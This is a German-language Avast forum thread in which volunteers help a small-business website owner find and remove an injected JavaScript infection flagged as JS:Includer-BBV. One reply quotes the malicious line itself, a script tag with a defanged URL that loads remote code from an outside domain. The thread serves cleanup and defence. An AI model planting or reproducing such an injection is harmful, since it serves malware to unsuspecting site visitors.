Avast WEBforum

Non-English Zone => Deutsch => Topic started by: REDACTED on December 28, 2015, 01:21:49 PM

Title: JS:Includer-BBV
Post by: REDACTED on December 28, 2015, 01:21:49 PM

Beiträge: 1
Profil anzeigen
 E-Mail
 Private Mitteilung (Online)
 







JS:Includer-BBV auf der Homepage

« am: Heute um 12:37:24 Nachmittag »


Zitat

 
Ändern

 

Hallo Profis,

bei mir ist das Problem, ich hab den JS:Includer-BBV nicht auf dem Rechner sondern online auf der Homepage :-(

Ich habe von meinem Provider eine Email erhalten dass er meine Homepage vorübergehend gesperrt hat weil über die Domain ein Virus verteilt wird.

Nun habe ich mir die .html Dateien mal runtergezogen und mit AVAST geprüft Ergebnis "Bedrohung: JS:Includer-BBV"

Ich kann aber in der html Datei nichts finden was "komisch" aussieht.. Weiß jemand einen Rat wie ich die Linie mit dem script finden kann?

URL: www.arga-tec.de

Grüße Jochen

Title: Re: JS:Includer-BBV
Post by: Asyn on December 28, 2015, 01:26:01 PM

Hallo Jochen, siehe: https://sitecheck.sucuri.net/results/www.arga-tec.de/

Willkommen im Forum,
Asyn

Title: Re: JS:Includer-BBV
Post by: Pondus on December 28, 2015, 01:29:04 PM

Killmalware:  http://killmalware.com/www.arga-tec.de/

Unmaskparasites:  http://www.UnmaskParasites.com/security-report/?page=www.arga-tec.de

Title: Re: JS:Includer-BBV
Post by: polonus on December 28, 2015, 01:36:24 PM

Sucuri meint dies auf zu finden: Bekanntes javascript malware. Details: http://labs.sucuri.net/db/malware/mwjs-include-suspicious?v14
      </div><!--a98c77--><script type="text/javascript" src="hxtp://lovelylittle.com.au/dmw6cjrz.php?id=1543174"></script><!--/a98c77-->
Nichts hier: https://urlquery.net/report.php?id=1451305076135
Blockiert fuer mich von Scriptblocker: GET -/cgi-bin/counter/stats.cgi?id=argatec&gid=&loc=-http%3A//www.arga-tec.de/&ref=&res=1600x900&browser=Microsoft%20Internet%20Explorer%208&offset=1%E2%84%91=kkk_weiss.png&display=standard HTTP/1.1
Host: wXw.multicounter.de
Hier nichts Ominöses vorhanden oder auf zu finden:  http://fetch.scritch.org/%2Bfetch/?url=www.arga-tec.de&useragent=Fetch+useragent&accept_encoding=
Aber Google Safebrowsing warnt: http://killmalware.com/www.arga-tec.de/
weil Drohung nicht mehr vorhanden scheint: -http://lovelylittle.com.au/dmw6cjrz.php?id=1543175 (leer)
aber Hauptseite von Avast noch als infekziert angegeben sei, wie mit JS-Includer-BVV[Trj] verzeugt.

polonus

Title: Re: JS:Includer-BBV
Post by: REDACTED on December 28, 2015, 02:58:38 PM

vielen lieben Dank an euch.

Ich habe jetzt alle htm Dateien auf dem Server gelöscht, aus den betroffenen Dateien  Linie rausgelöscht, und die bearbeiteten Dateien neu auf den Server geladen.

Wenn ich jetzt die Seiten meiner Homepage aufrufe, kommt keine Warnmeldung mehr aber wenn ich die URL mit http://killmalware.com/www.arga-tec.de/ scanne, findet er anscheinend trotzdem noch die betroffenen htm Dateien.. kann es sein das ich einfach noch warten muss für einen neuen scan?

 

Title: Re: JS:Includer-BBV
Post by: polonus on December 28, 2015, 04:24:03 PM

Gerne gemacht,
Killmalware ist noch nicht aktualisiert, dass wird ja auch weiter behoben sein.
Ein Gutes Jahresende fuer Ihre Webseite...  ;)

Damian aka polonus

Title: Re: JS:Includer-BBV
Post by: polonus on December 28, 2015, 05:46:22 PM

Alles OK hier: http://killmalware.com/www.arga-tec.de/#
Google Safebrowsing muss noch die Meldung aendern!

polonus

Title: Re: JS:Includer-BBV
Post by: Asyn on December 29, 2015, 05:14:40 AM

Quote from: Joe721 on December 28, 2015, 02:58:38 PM

vielen lieben Dank an euch.

Bitteschön. :)